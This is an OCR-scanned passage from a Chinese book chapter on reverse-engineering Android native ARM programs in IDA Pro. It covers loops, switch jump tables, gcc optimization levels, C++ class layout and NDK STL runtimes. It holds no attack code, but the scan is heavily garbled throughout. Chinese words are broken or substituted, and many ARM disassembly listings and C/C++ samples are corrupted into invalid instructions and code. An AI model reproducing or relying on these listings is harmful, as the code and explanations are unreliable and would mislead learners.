实 ，IDA 了 Pro 在 解析 这 行 代码 时 ， 采 用 了 基于 开辟 栈 空间 前 SP 寄存 器 的 
值 来 作为 基 址 进行 寻 址 ，STR R3,[R11,#0x14+var_24] 实 际 值 为 STR R3， 
[R11,var_10]，IDA Pro 在 函数 识别 时 根据 开辟 的 栈 空间 认为 栈 上 有 7 个 
变量 ， 并 将 临时 变量 的 空间 大 小 解析 成 了 0x24， 很 显然 这 样 的 识别 是 不 
准确 的 。 要 解决 这 个 问题 也 很 简单 ， 在 函数 名 上 点 击 右 键 Edit 
function， 在 弹出 的 Edit function 对 话 框 中 将 Local variables area 的 值 改 成 
0x14， 点 击 OK 按 钮 关闭 对 话 框 。IDA Pro 此 时 会 重新 分 析 并 给 出 正确 的 
反 汇编 代 码 如 下 : 








STR 
ADD 
SUB 
STR 
MOV 
STR 
MOV 
STR 


R11, [SP,#-4+var_0]! 
民 半 元 芒 忆 3 “和 

SP, SP, #0x14 

RO, [R11,#-0x10] 
R31 

R3, [R11,#-0xC] 

R35 ‘$0 

R3, [R11,#-8] 





这 时 唯一 看 着 不 太 舒 适 的 是 偏 移 值 以 高 之 的 红色 显示 ， 不 过 这 不 影 
啊 我 们 后 面 的 分 析 工 作 。 接 下 来 对 loc_82E0 处 的 代码 进行 分 析 : 


MD OU 和 WwW RN Pp 


| 
SS 0 Ry FS 


15 
16 


loc_82E 
LDR 
LDR 
ADD 
STR 
LDR 


CMP 
BNE 


0 

R22 [Ra 8] 
RS LRC 
Ra i 

R3s [RIL;#var :8] 
R2,. [RIL.,Hvar. | 
R33 [RIT eV 
R23 和 3 

R3, #0 

有 37 种 业 

R3, ‘R3, 0XxFF 
R2; [RilLi:#wvar eC) 
a 

Res Ra CGI 
有 R35 涝 0 

loc_ 82E0 


@R2=s 

@R3=1i 

@R3=s + 1 

@ 保 存 s + i 

QR2=1 

@R3=n 

@ 比 较 i 与 n 

这 ER ED 
(I 过 2、 和 入 二 = 交 
@R3 与 全 1 进行 与 操作 
@R2=1i 

@i++ 

@ 保 存 i 

@R3 是 否 为 0， 为 0 表示 小 于 i>=n 
@ 循 环 执行 


第 1 行为 代码 块 的 标号 ， 由 IDA Pro 创建， 第 2 行 代码 取 s 的 值 ， 第 3 
行 取 i 的 值 ， 第 4、5 行 进行 s 与 的 囚 加 并 保存 ， 第 7-10 行 比较 i 与 n"， 如 果 i 
大 于 等 于 n (Gan 的 值 为 100) ， 则 R3 赋 值 为 0， 反 之 ，i 小 于 n 时 ，R3 赋 值 为 


1。 和 第 11 行 R3 与 全 1 进行 与 操作 ， 第 12-14 行 保存 i++ 的 结 





， 第 15-16 行 


进行 条 件 判 断 ， 如 果 满 足 就 继续 执行 循环 体 。 反 之 ， 取 出 结果 ， 赋 值 给 
R0 后 程序 返回 。 


接 下 来 看 看 whiledo 函 数 。 它 的 流程 如 图 7-12 所 示 。 


; httributes: bp-based frame 


EXPORT whiledo 


whiledo 


var_ 24= 
var_20= 
var_1C= 
ua 108= 


一 自 XK 有 2 上 是 
—Bx208 
—Bx1C 
-Bx18 


var C= =BxC 
var B= -$8 


var_ t= 


R11, [SP,#-h+uar Og] 

R11，SP ， 世 日 

SP，SP， 拓 四 X1 Ah 

RGB，[R1T ,#0x14ewar 24] 

R3,。 闫 1 

R3, [R11,#6x14rvuar 28] 

R3, #8 

R3, [R11,#6x14+uar 1C] 
_8370 


loc 8370 


LDR 


R2, [R11,Wvar C] 
R3，[R11,#uar_16] 
R2，R3 

loc 8354 


R3，[R11 ,4#uar 8] 
RB，R3 


[R11 ,#uar 8] SP R11 
[R11 ,#uar C] SSP, {R11 


R2, R3 


LR 


[R11,#uar 8] ; End of functiom whiledo 
[R11,#var_C] 


R3， 贡 1 


[R11,#uar 5] 




















图 7-12 ”使 用 IDA Pro 分 析 whiledo 函 数 


细心 的 读者 会 发 现 ，whiledo 函 数 的 流程 与 for 循 环 的 流程 网 非常 相 
似 。 从 上 面 的 图 中 可 以 发 现 ，whiledo 函 数 的 流程 比 dowhile 的 流程 要 清 
蜥 ， 函 数 体 部 分 的 代码 块 分 工 明 确 ， 一 目 了 然 。 其 实 ， 在 实际 的 编码 过 
程 中 ， 尽 管 for 循 环 与 while 循 环 在 细节 上 有 所 差别 ， 但 有 很 多 时 候 是 可 
以 互相 取代 的 。 


7.4.5 ”switch 分 支 语句 反 沪 编 代码 的 特点 
switch 分 支 多 用 在 分 支 判 断 较 多 且 条 件 单一 的 情况 下 ， 它 让 代码 更 


加 简练 、 美 观 ， 它 的 反 汇编 代码 又 有 着 自己 的 独特 之 处 。 实 例 代码 如 
下 : 











#include <stdio.h> 
int :switcehl (int rae "int hs ‘Tnt: 开光 
Switch (i)t{ 
case 1: 
return a + b; 
break; 
Case 2: 
return a - b; 
break; 
Case 3: 
EU a Ds 
break:; 
case 4: 
return a / b; 
break; 
default: 
return a + b; 
break; 


} 
int main(int argce; int** argv[])t 
erinbftv ewitehlevavn; Switohl (ta Ss dls 
return 0; 
} 
switch1 函 数 传 入 三 个 参数 ， 根 据 第 三 个 参数 的 值 来 控制 前 两 个 参数 
的 运算 。 编 译 生 成 程序 后 将 其 拖 入 IDA Pro 中， 查看 switch1 的 反 汇编 结 
末 ， 流 程 如 图 7-13 所 示 。 
































图 7-13 ”使 用 IDA Pro 分 析 switch1 函 数 





switch1 函 数 流程 看 上 去 像 是 一 只 旋转 的 陀螺 ， 陀 螺 的 顶部 是 函数 的 
初始 化 部 分 ， 底 部 是 函数 的 出 口 ， 每 个 分 文 最 终 殊途同归 。 每 个 分 文体 
的 最 上 面 都 是 一 行 跳 转 指令 ， 它 被 称 为 switch 分 支 的 “ 跳 转 表 ”， 我 们 通 
过 代码 来 看 看 ， 它 是 如 何 协同 switch 语 名 工作 的 。 先 看 函数 的 初始 化 部 


MA 小 





思 : 
1 STMFD SPl: tll LR 
2 ADD R11 SP; “#4 
3 SIIB SP, SP, #0x10 
4 STR RO [RIL];#var..8] 
SR R1, [R11 ,Hvar | 
6 STR Ra; [RLL;tWAE 0) 
7 LDR Re [RL et ar 1 
8 SUB 0 二 浊 寺 
9 CMP R33 ‘#3 ; Switch 4 cases 


10 ADDLS PC, PC, R3,LSL#2 ; Switch jump 

第 1-3 行 代码 保存 现场 、 设 置 栈 帧 指针 、 开 辟 栈 空间 。 第 4-6 行 临时 
保存 函数 的 参数 ， 这 些 与 前 面 分 析 的 函数 都 类 似 。 第 7 行 取 第 三 个 参 
数 ， 即 switch 分 文 要 判断 的 数据 ， 第 8 行将 值 减 去 1， 第 9 行将 值 与 3 比 
较 ， 另 外 代码 注释 给 出 了 提示 ， 这 个 switch 有 4 个 分 文 〈 难 道 IDA_ Pro 把 


default 分 支 不 当 回 事 了 ? ) 。 第 10 行 是 本 函数 的 关键 语句 ， 还 记得 for 循 
环 实例 的 for2 函 数 吗 ? 、 数 中 ， 访 问 全 局 数组 时 用 到 了 LDR  R2, 
[R2,R0,LSL#2] 这 条 指令 ， 这 是 通过 索引 读 取 内 存 地 址 的 一 种 经 典 手 

法 ， 同 样 的 ，“ADDLS PC, PC, R3,LSL#2” 可 以 说 是 用 来 判断 switch 语 句 
的 特征 码 ，R3 是 要 判断 的 变量 的 值 ， 通 过 对 R3 的 左 移 两 位 ， 计 算出 跳 

转 表 的 偏 移 量 ， 将 PC 加 上 这 个 偏 移 量 就 直接 跳 转 到 跳 转 表 中 的 相应 条 

目 ， 在 这 里 ，ADDLS 表 明了 只 有 第 9 行 代码 比较 结果 小 于 等 于 3， 

量 n 小 于 等 于 4 时 PC 就 会 被 重新 赋值 ， 之 所 以 可 以 这 样 设置 PC 的 值 ， 

因为 这 条 指令 的 下 一 行 代码 起 就 是 跳 转 表 ， 代码 如 下 : 


.text:0000831C ; --------------------------------------------- 

,七 ext:0000831C 

.text:0000831C loc_831C ; CODE XREF: switchl+241j 
.text:0000831C B LoG..832G ; jumptable 00008314 case 0 
.text:00008320 ; --------------------------------------------- 
.text:00008320 

.text:00008320 loc_8320 ; CODE XREF: switchl+241j 
.text:00008320 B Toc :333 ; jumptable 00008314 case 1 
.text:00008324 ; ---------------------------------------- 一 -一 -一 
.text:00008324 

.text:00008324 loc_8324 ; CODE XREF: switchl+241j 
.text:00008324 B loc_834C ; jumptable 00008314 case 2 
.text:00008328 ; --------------------------------------------- 
.text:00008328 

.text:00008328 loc_8328 ; CODE XREF: switchl+241j 
.text:00008328 B To 38358 ; jumptable 00008314 case 3 
.text:0000832C ; ----------- 一 -一 -一 -一 一 一 一 一 一 一 一 一 -一 -一 -一 -一 -一 一 一 一 一 一 一 一 一 
.text:0000832C 

















.text:0000832C loc_832C ; CODE XREF: switchl+241j 
.text:0000832C ; Switchil:1loc 831C1] 
.text:0000832C LDR R2, [R11,#var 8] ; jumptable 00008314 case 0 
.text:00008330 LDR 3 [RIL warae] 

.text:00008334 ADD R33 R22 R3 

.text:00008338 B Lo 837C 
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ADDLS 中 LS 为 指令 的 条 件 码 ， 表 示 代 码 执行 条 件 为 标志 位 C=0,Z=1， 即 上 一 条 指令 运算 结 

















果 小 于 或 等 于 0 时 才 执 行 加 法 操作 。 在 指令 中 使 用 各 种 条 件 码 比较 常见 ， 如 果 读 者 实在 记 不 住 ， 
可 以 查看 上 一 章 中 的 介绍 ， 或 者 翻 看 ARM 指 令 集 手册 。 












































每 一 个 B 指 令 后 面 跟 独 的 地 址 都 为 一 个 分 文 的 执行 体 ， 实 例 中 减法 


的 分 支 代 码 为 ; 
出 Ge 833C ; Jumptable 00008314 case 1 
2 LDR R25 [RIL; #4 Var 3] 
3 LDR R33 [RIL.HVar © 
4 RSB R37’ R3s RR2 
. B on.837e 


第 2 行 取 第 1 个 参数 的 值 ， 第 3 行 取 第 2 个 参数 的 值 ， 第 4 行 执行 逆 癌 
减法 操作 ， 即 R3=R2-R3， 第 5 行 跳 转 到 函数 的 出 口 处 ， 对 于 每 个 分 文 而 
言 ， 都 有 这 条 跳 转 指令 。 


7.4.6 ”原生 程序 的 编译 时 优化 


原生 程序 的 优化 属于 gcc 编 译 器 控制 的 部 分 ， 未 经 过 优化 的 代码 与 
经 过 优化 的 代码 有 很 大 的 区 别 ， 在 实际 逆 同 分 析 中 大 多 过 见 的 是 优化 过 
的 代码 。gcc 编 译 优化 通过 -O (字母 “O”) 选项 来 提供 ， 有 0、1、2、3、 
s 共 五 个 优化 等 级 。 

等 级 0: 不 优化 。 在 makefile 文 件 中 未 指定 -0 选项 时 默认 为 不 优化 。 

等 级 1: 开启 部 分 优化 ， 该 模式 下 ， 编 译 会 尝试 减少 代码 体积 和 代 
人 码 运 行 时 间 。 但 是 并 不 执行 会 花费 大 量 时 间 的 优化 操作 。 

等 级 2: 比 等 级 1 更 进一步 优化 ， 在 该 模式 下 ， 并 不 执行 循环 展开 和 
函数 内 联 优化 操作 ， 与 -01 比 较 该 模式 会 花费 更 多 的 编译 时 间 ， 并 生成 
性 能 更 好 的 代码 。 

等 级 3: 包括 等 级 2 所 有 的 优化 ， 并 开局 循环 展开 和 函数 内 联 优化 操 
全 











等 级 Ss: 针对 程序 大 小 进行 优化 ， 该 模式 会 执行 -02 等 级 中 除了 会 增 
加 程序 空间 的 所 有 优化 参数 ， 同 时 增加 了 一 些 优化 程序 空间 的 选项 。 

编译 器 优化 的 选项 非常 之 多 ， 我 们 不 去 深 完 具 体 每 个 等 级 的 优化 选 
项 ， 只 通过 使 用 不 同等 级 优化 来 比较 程序 的 大 小 及 代码 差异 。 

下 面 编写 一 段 代 码 测试 gcc 优 化 选项 ， 完 整 代码 如 下 : 





#include <stdio.h> 

inline int MAX(int a，int b){ // 内 联 函数 ， 求 最 大 数 
reconrn. tor Bl 7 

} 

inline int MIN(int a，int b){ // 内 联 函 数 ， 求 最 小 数 
A 


} 
double add(int n){  // 耗 时 算法 
1 
int ms; 
int x = 10000; 
i Wr = ZO0000: 
m = MAX(n, x); 
m = MIN(n, y); 
double s = 0.0; 
EGE (二 和 
8 Fs 3 0 .A011.; 
} 
FOF (Ls 0 
Ss = LW 2 
} 
return s; 
} 


int main(int argc，int** argv[]){ // 程 序 从 这 里 开始 执行 
printf("value is:%lf\n", add(15000)); 
return 0; 
} 
玉 用 7.1.2 市 的 方法 来 编译 工程 。 采 用 makefile 手 动 方 法 编译 需要 注 
意 一 点 : 代码 中 使 用 到 了 加 减 乘 除 运 算 操 作 ， 程 序 在 链接 时 需要 加 入 
libgcc.a 库 文件 ， 而 如 果 采 用 ndk-build 方 式 编译 ，Android NDK 提 供 的 脚 











本 会 自动 完成 相关 的 链接 操作 。 本 例 提 供 的 makefile 工 程 编译 了 0-s5 个 

优化 等 级 的 程序 。 如 果 采 用 Eclipse 来 编译 工程 ， 编 译 选 项 就 有 一 些 特别 
了 。 负 责 程序 优化 的 选项 为 APP_OPTIM， 需 要 在 Application.mk 文 件 中 
指定 ， 并 且 赋 值 只 能 是 debug 或 release 两 个 选项 之 一 。 它 在 Android NDK 
目录 的 build\core\add-application.mk 文 件 中 定义 为 : 如 果 APP_OPTIM 指 

定 为 debug， 那 么 程序 在 编译 时 会 加 入 -O00 选项 ， 即 对 代码 不 进行 优化 ; 

反之 ， 为 release 情 况 时 ， 会 加 入 -02 选 项 对 代码 进行 2 级 优化 。 最 后 ， 在 
definitions.mk 文 件 中 发 现 ，APP_OPTIM 选 项 被 定义 为 

NDK_APP VARS_OPTIONAL， 即 这 个 选项 是 可 选 的 ， 因 此 ， 在 编写 

Application.mk 文 件 时 不 定义 这 个 选项 ， 而 直接 传 入 APP_CFLAGS += - 
OX 〈“X2" 为 优化 等 级 ) 选项 来 进行 代码 的 优化 。 编 译 生成 可 执行 程序 后 
在 模拟 器 上 运行 测试 ， 执 行 的 效果 如 表 7-1 所 示 。 


表 7-1 ”gcc 编译 优化 等 级 对 比 测试 
优化 等 级 文件 大 小 〈 字 节 ) 执行 时 间 





















0 8430 real 0m 33.42s /user 0m 32.71s 
1 8190 | real Om 28.21s /user 0m 27.39s 
2 8174 | real Om 27.61s /user 0m 27.39s 
3 8174 real Om 27.79s /user “0m 27.39s 











Ss 9621 real Om 35.97s /user 0m 34.76s 





技巧 
测试 程序 执行 时 间 可 以 在 模拟 器 或 手机 安装 busybox 工 具 ， 使 用 time 命 令 进行 测试 。 
Android 系 统 的 系统 内 核 采 用 Linux， 本 身 自 带 的 许多 实用 小 工具 在 移植 时 都 被 去 除了 ， 
busybox for android 自 带 了 100 多 个 实用 命令 ， 有 了 它 ， 可 以 很 方便 地 在 adb shell 下 执行 Linux 常 用 
命令 。 详 细 的 安装 方法 读者 可 以 到 搜索 引擎 中 搜索 。 
本 例 中 测试 执行 时 间 使 用 以 下 命令 : adb shell time/data/local/arithmetic 






















































































本 程序 中 2 级 优化 与 3 级 优化 的 效果 是 一 样 的 ， 且 执行 速度 是 最 快 


的 。 再 来 看 看 它们 代码 流程 分 别 如 图 7-14、 图 7-15、 图 7-16、 图 7-17 所 
示 。 










= 
__ Floatsidf 


aeabi djadd 


图 7-14 ”未 经 过 优化 的 代码 






了 


v v Fs 
dword_83C4 dword_ 8S3C8 上 dword S83CCH dword 83D6 








_ floatsidf __ muldf3 


_aeabi dadd 











图 7-15 ”经 过 等 级 1 优化 过 的 代码 





昌 则 v 时 
dword 83BCH ldword 83C6|dwuord 83Cah ldword 83C8 
_floatsidf __muldf3 






_ aeabi_ dadd 


图 7-16 ”经 过 等 级 2 与 等 级 3 优化 过 的 代码 
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dvord_8308 
TE 





图 7-17 经 过 等 级 s 优 化 过 的 代码 


通过 IDA Pro 提供 的 分 析 图 可 以 肥 现 ， 代 码 在 未 经 过 优化 时 ， 会 保 





存 所 有 的 变量 及 冰 数 调用 ， 等 级 1 优化 了 内 联 函数 ， 等 级 2 与 等 级 3 之 间 
的 差异 并 不 是 很 大 ， 只 是 在 个 别 指 令 调用 顺序 上 进行 了 调整 ， 等 级 s 在 
本 例 中 无 论 是 文件 大 小 还 是 执行 效率 都 是 表现 最 关 的 ， 另 外 ， 为 了 提高 
程序 执行 效率 ， 等 级 1 一 3 都 将 除法 指令 转换 成 了 相应 的 乘法 与 加 法 指 





令 ， 而 等 级 s 则 没有 。 

再 来 看 看 另 一 个 例子 ， 主 要 碍 看 代码 优化 前 后 寄存 器 使 用 的 变化 。 
代码 选择 了 7.3.4 节 的 while 实 例 ， 将 编译 器 的 优化 等 级 设计 为 02， 然 后 
编译 程序 ， 将 生成 的 可 执行 文件 拖 入 IDA Pro 主 窗口 ， 最 后 得 到 dowhile 
函数 代码 如 图 7-18 所 示 。 








; Segment type: Pure code 
AREA .text, CODE, ALIGN=4 
; ORG 98x82C8 

CODE32 


EXPORT dowhile 
dowhile 

MOU R2 ， 划 人 @ 
MOU R3， 划 1 


HOU RB，R2 
BX LR 
; End of function dowhile 





图 7-18 ”经 过 等 级 2 优化 过 的 dowhile 函 数 


对 比 图 7-11 与 图 7-18 可 以 发 现 ， 经 过 优化 的 代码 将 原先 基于 栈 变 量 


的 操作 全 部 转换 成 了 寄存 占 间 的 操作 ， 去 挥 了 对 栈 帧 寄存 器 R11 的 引 
用 ， 这 样 生 成 的 代码 更 加 简练 ， 占 用 磁盘 空间 更 小 ， 而 且 运 行 速度 更 
快 。 





7.5 原生 C++ 程序 逆向 分 析 


在 上 一 市 中 ， 笔 者 通过 不 同 的 实例 分 析 了 C 语 言 原生 程序 的 各 种 语 
句 结构 ， 并 探讨 了 分 析 它 们 的 方法 。 在 本 节 ， 我 们 将 一 如 既往 的 分 析 原 
生 程序 ， 而 程序 的 开发 语言 则 从 C 升 级 成 为 C++。 本 市 主要 从 C++ 的 
类 、 成 员 变 量 以 及 成 员 函 数 等 多 个 方面 进行 分 析 。 














7.5.1 C++ 类 的 逆向 


C++ 语言 是 面向 对 象 的 开发 语言 ， 可 以 理解 为 C 语 言 的 一 个 扩展 。 
就 语言 本 身 的 特性 而 言 ，C++ 是 一 门 比较 难 的 开发 语言 ， 开 发 人 员 掌握 
它 就 需要 花 上 不 少时 间 ， 因 此 逆向 C++ 程序 的 难度 自然 也 可 想 而 知 ， 没 
有 较 深 入 的 C++ 语言 知识 ， 很 难 在 C++ 代码 逆向 方面 有 大 的 突破 ， 本 小 
节 介 绍 的 实例 代码 也 只 是 简单 的 展示 一 下 C++ 语言 的 特性 所 呈现 出 的 反 
汇编 代码 。 

逆 癌 C++ 代码 主要 是 逆 回 C++ 的 类 ， 如 果 C++ 人 代码 不 涉及 到 类 ， 也 
只 能 是 当 C 语 言 程序 来 看 待 了 。 下 面 是 本 小 节 的 实例 代码 。 











#include <stdio.h> 


class aclasst{ // aclass 类 
private: / /两 个 私有 成 员 变 量 
int, my 
char © 
public: 


aclass(int i, char ch) { / /构造 函数 
Drintf(t"Construetor alled Mn"): 
this->m = i; 
this->e = ch; 

} 

~aclass() { // 析 构 函 数 
printf("Destructor called.\n"); 

} 

int getM() const { 
return m; 

} 

void setM(int m) { 
this->m = m; 

} 

char getC() constt{ 
return c; 

bs 

void setC(char c) { 
this->c = ¢; 

} 

int add(int an dnt BD A // 成 员 图 数 aaa () 
printf("%d\n", at+b); 


> 

int main(int argc, char* argv[])t{ 
aclass *a = new aclass(3, 'c'); 
a->setM(5); 
a->setC('a'); 
a->add(2, 8); 
printf("%d\n", a->getM()); 
delete a; 


return 0; 


这 段 代 码 定 义 了 一 个 aclass 类 ， 该 类 有 2 个 私有 成 员 变 量 、1 个 构造 
函数 、1 个 析 构 函数 ， 还 有 5 个 成 员 函 数 。main0 函 数 第 一 行 代码 new 了 
一 个 aclass 对 象 指针 〈 这 里 之 所 以 没有 直接 声明 aclass 类 ， 是 因为 gcc 编 译 
器 会 检测 到 代码 的 计算 结果 ， 将 类 的 调用 代码 优化 掉 ) ， 然 后 设置 了 
aclass 的 两 个 变量 的 值 ， 并 调用 了 add0 成 员 困 数 ， 接 着 使 用 printfO 输 出 
了 成 员 变量 mm 的 值 ， 最 后 调用 delete 来 释放 a 指 针 。 没 有 学 过 C++ 的 朋友 
看 到 这 段 代 码 时 除了 对 “->” 符 号 不 太 理解 外 〈 它 的 作用 是 访问 类 的 成 员 
变量 或 成 员 函 数 ) ， 其 它 的 代码 应 该 都 能 够 通过 自己 所 学 的 Java 知 识 来 
融会 贯通 。 编 译 生成 cpp2 后 拖 放 到 IDA Pro 上 看 其 反 汇 编 代 码 。 











main 
STMFD SP!, {RA4-R6,LR} 
MOV RO，#8 


BL _Znw]j ; Operator new(uint) 
MOV R4, RO @ 保 存 分 配 的 内 存 对 象 地 址 

LDR RO, =(aConstructorCal - 0x8620) 

LDR R5, =(aD - 0x862C) 

ADD RU, :PG,. RO i "COnstEuctor GalLled." 
BL puts @ 输 出 构造 函数 被 调用 

MOV RS 等 @m=5 

ADD Ro PE RS a 

STR R3, [R4] @setM(5) 


MOV R3 ， 间 0x61 @'a' 
STRB R3, [R4,#4] @setC('‘a’) 
MOV R1，#0xaeadd(2，8) 被 优化 掉 了 


MOV 有 二， 下 5 ;» format 

BL printE 

LDR R1, [R4] @R4 指 向 的 内 存 地 址 处 第 一 项 为 成 员 变 量 m 
MOV RU RS ; format 

BL printf 

LDR RO, =(aDestructorCall - 0x8658) 

ADD RO PC RO : "Destructor Called:” 

BL puts @ 输 出 析 构 函数 被 调用 

MOV RO, R4 » ROA * 

BL _ZdlPv ; Operator deletel(void *) 


MOV RO, #0 

LDMFD SP!, {R4-R6,PC)} @ 程 序 返 回 

IDA Pro 将 new 操 作 解 析 为 了 符号 _Znwj， 不 过 在 注释 中 了 指明 了 它 
为 new 操 作 符 。new 操 作 符 共 分 配 了 8 字 节 的 存储 空间 ，aclass 类 共有 两 
个 成 员 变量 ， 它 们 就 占用 了 8 个 存储 单元 ， 那 其 它 的 函数 呢 ? 它们 没有 














占用 存储 空间 吗 ? 这 里 的 setMO 与 setCO 被 优化 成 了 直接 访问 R4 寄 存 器 

所 指向 的 存储 单元 的 代码 ， 我 们 看 “STRB R3，[R4,#4]”* 这 条 指令 ，R4 为 
new 操 作 符 分 配 的 内 存 ， 理 论 上 它 指向 aclass 类 的 首 地 址 ， 那 aclass 类 的 

内 存 布局 与 类 的 声明 有 什么 联系 ?宏观 上 ， 我 们 可 以 将 C++ 的 类 理解 为 
C 语 言 中 的 结构 体 ， 每 一 个 成 员 变 量 就 是 一 个 结构 字段 ， 每 一 个 成 员 也 
数 的 代码 都 被 优化 到 了 类 的 外 部 ， 它 们 不 占据 存储 空间 。 回 头 看 “STRB 
R3，[R4,#4]” 就 很 容易 理解 了 ， 这 是 在 访问 类 的 第 2 个 成 员 变 量 啊 ! 成 员 
函数 add0 也 被 优化 掉 了 ， 而 且 传 递 的 两 个 参数 也 被 gcc 编 译 器 直接 算出 

结果 了 。 最 后 ， 因 为 调用 delete 的 关系 ，GCC 编 译 器 也 “规范 ”的 插入 了 

析 构 函数 的 代码 。 











7.5.2 ” Android NDK 对 C++ 特性 的 支持 


C++ 的 一 些 常用 特性 包括 STL (Standard Template Library， 标 准 模 
板 库 ) 、C++ 异 常 、RTTI (Run-Time Type Identification， 运 行 时 类 型 识 
别 ) 等 。 早 先 版 本 的 Android NDK 对 它们 的 支持 有 些 问 题 ， 随 着 版 本 的 
不 断 升级 ， 如 今 的 R8 版 本 对 它们 的 支持 已 经 很 好 了 。 

Android NDK R8 提 供 了 四 套 运行 时 环境 来 文 持 C++ 的 特性 。 它 们 分 
别 是 system、gabi++、stlport、gnustl。 它 们 对 C++ 的 特性 支持 如 表 7-2 所 











人 外 O 
表 7-2 Android NDK 运 行 库 对 C++ 特性 的 文 持 
C++ 上 xceptions C++ RTTI Standard Library 
system 
gabli+ 十 
stlport 
gnustl 








要 想 启 用 不 同 的 运行 库 ， 需 要 在 Application.mk 文 件 中 定义 


APP_STL， 它 的 取 值 如 表 7-3 所 示 。 
表 7-3 APP_STL 的 取 值 及 含义 


system 默认 使 用 系统 C++ 运行 库 
gabi++ static 使 用 Gabi++ 运 行 库 作 为 静态 库 
gabi++ _ shared 使 用 Gabi++ 运 行 库 作为 动态 库 











stlport static 使 用 STLport 运行 库 作 为 静态 库 
stlport shared 使 用 STLport 运行 库 作 为 动态 库 
gnustl static 使 用 GNU STL 作为 静态 库 
gnustl shared 使 用 GNU STL 作为 动态 库 
system 是 Android NDK 默 认 提 供 的 运行 库 ， 使 用 它 最 终生 成 的 程序 
会 链接 libstdc++.so 库 文件 。system 作 为 最 基础 的 C++ 文 持 库 ， 并 不 文 持 
额外 的 C++ 特 性 ， 因 此 ， 它 通常 应 用 于 小 型 的 C++ 程 序 。 

比 起 system 的 “一 无 所 有 ”，gabi++ 提 供 了 RTTI 的 支持 ， 它 是 最 小 的 
支持 C++ 特性 。Android NDK 是 从 R5 版 本 起 支持 RTTI 的 ， 默 认 gcc 的 命 
令 行 参数 中 “-fno-rtti* 会 禁止 RTTI 支 持 ， 要 想 使 用 gabi++ 启 用 RTTI， 除 
了 需要 在 Application.mk 文 件 中 添加 “APP_STL = 








gabi++_static” 或 “APP_STL 二 gabi++_shared”， 还 需要 还 
加 “APP_CPPFLAGS 十 二 -frtti”， 或 者 在 Android.mk 文 件 中 添 


加 “LOCAL CPP _ FEATURES += rtti”。 

STLport 是 一 套 STL 库 ， 它 的 官网 为 http://www.stlport.org，Android 
NDK 中 提供 了 它 的 Android 移 植 版 ， 要 想 使 用 该 STL 库 ， 需 要 在 
Application.mk 文 件 中 设置 “APP_STL := stlport_static” 或 “APP_STL := 
stlport_shared”。 如 果 使 用 静态 版 本 的 STLport， 代 码 中 使 用 的 所 有 
C++ 特性 及 函数 都 会 静态 链接 到 原生 程序 中 ， 这 样 生 成 的 程序 比较 大 ， 
但 运行 效果 比较 稳定 ， 如 果 使 用 动态 版 本 的 STLport， 则 与 原生 程序 发 
布 时 会 随同 附带 一 个 libstlport_shared.so 文 件 ， 这 样 生 成 的 原生 程序 会 比 
较 小 。 男 外 ，Android “NDK 默 认 的 gcc 命 令 行 参 数 “-fno-exceptions” 会 禁 


止 C++ 异常 特性 ， 要 想 司 用 C++ 异常 特性 ， 需 要 在 Application.mk 文 件 中 
添加 “APP_CPPFLAGS += -fexceptions”， 或 者 在 Android.mk 文 件 中 添 
加 “LOCAL CPP FEATURES += exceptions”。 

GNU STL 是 最 大 的 STL 库 ， 它 提供 了 完整 的 C++ 特性 支持 。 要 想 使 
用 该 STL 库 ， 需 要 在 Application.mk 文 件 中 设置 “APP_STL 这 
gnustl]_static” 或 “APP_STL := gnustl_shared”。 如 果 使 用 静态 版 本 的 GN 
STL， 生 成 的 文件 比 使 用 STLport 静 态 版 本 生成 的 程序 还 要 大 ， 使 用 动态 
版 本 的 GNU SIL 则 会 在 原生 程序 发 布 时 随同 附带 一 个 libgnustl_shared.so 
文件 ， 它 的 大 小 是 libstlport_shared.so 文 件 的 2 到 3 倍 。 同 样 ， 要 想 启 用 
RTTI 或 异常 特性 支持 ， 需 要 按照 上 面 介绍 gabi++ 与 STLport 时 的 方法 来 
开启 。 男 外 ，Android NDK 为 该 库 还 提供 了 一 个 变量 
APP_GNUSTL_FORCE_CPP_FEATURES， 可 以 指 
定 “APP_GNUSTL _FORCE_CPP ”FEATURES := exceptions rtti 来 同时 启 
用 RTTI 与 异常 特性 支持 。 

以 上 4 套 运行 库 的 源码 位 于 Android “NDK 的 sources\cxx-stl 目 录 下 ， 
读者 在 逆向 STL 代 码 时 可 以 对 照 源码 来 进行 分 析 。 


7.5.3 ”静态 链接 STL 与 动态 链接 STL 的 代码 区 别 


大 多 数 的 C++ 程序 都 会 使 用 STL 中 提供 的 函数 来 实现 软件 的 功能 ， 
掌握 STL 函 数 的 逆 辐 方法 也 成 为 了 提高 Android NDK 程 序 逆向 水 平 的 必 
经 之 路 。 在 上 一 小 节 中 ， 我 们 已 经 知道 Android “NDK 中 提供 了 4 种 类 型 
的 库 来 支持 C++ 特性 ， 其 中 STLport 与 GNU STL 提 供 了 STL 的 支持 ， 本 小 
节 我 们 使 用 GNU STL 来 编写 一 段 实例 代码 ， 实 例 中 的 类 仍然 选择 上 一 节 
中 的 aclass， 我 们 将 所 有 的 printf 输 出 全 部 换 成 std::cout 和 输出 ， 并 增加 头 文 


件 声明 “#include <iostream>” 与 名 称 空间 引用 “using namespace std;”， 最 
后 还 需要 在 Application.mk 中 设置 APP_STL 的 值 ， 我 们 先 设置 它 的 值 为 





gnustl_shared 来 看 看 动态 链接 的 STL 反 汇编 代码 。 在 命令 提示 符 下 输入 
ndk-build 编 译 工 程 ， 没 有 错误 的 话 会 在 工程 的 libsvarmeabi 目 录 下 生成 
cpp2 与 jibgnustl_shared.so 文 件 ， 将 cpp2 拖 入 IDA Pro 主 窗口 中 ， 反 汇编 代 


码 如 下 。 

,七 GXtL300008709C: 了 一 一 一 一 一 一 一 了 一 一 一 一 下 一 一 一 下 一 一 一 一 一 一 于 一 一 一 一 一 一 一 一 和 一 一 一 一 一 一 一 了 一 一 一 一 一 一 一 

.text:0000870C main ; CODE XREF: .text:loc_ 86B41]j 

.text:0000870C STMFD SP!, {R4-R10,LR} 

.text:00008710 MOV RO, #8 ; 8 字 节 为 aclass 类 的 大 小 

.七 ext :00008714 BL _Znwj ; operator newl(uint) 

.text:00008718 LDR R4, =(_GLOBAL OFFSET TABLE_ - 0x872C) 

.text:0000871C LDR R6; =0x40 

.text:00008720 LDR R1, =(aConstructorCal - 0x8740) 

.text:00008724 ADD R4; PC,; R4 

.text:00008728 LDR R5, [R4,R6] 

.text:0000872C MOV R71 RO ; aclass *a 

.text:00008730 MOV R2, #0x13 ; 需要 输出 的 字符 个 数 

.text:00008734 MOV RO, RS 

.text:00008738 ADD RL EG RL ”~ "ONnsteueeor alled.” 

.text:0000873C BL _ZSt16__ostream_insertIcSstllchar_ 
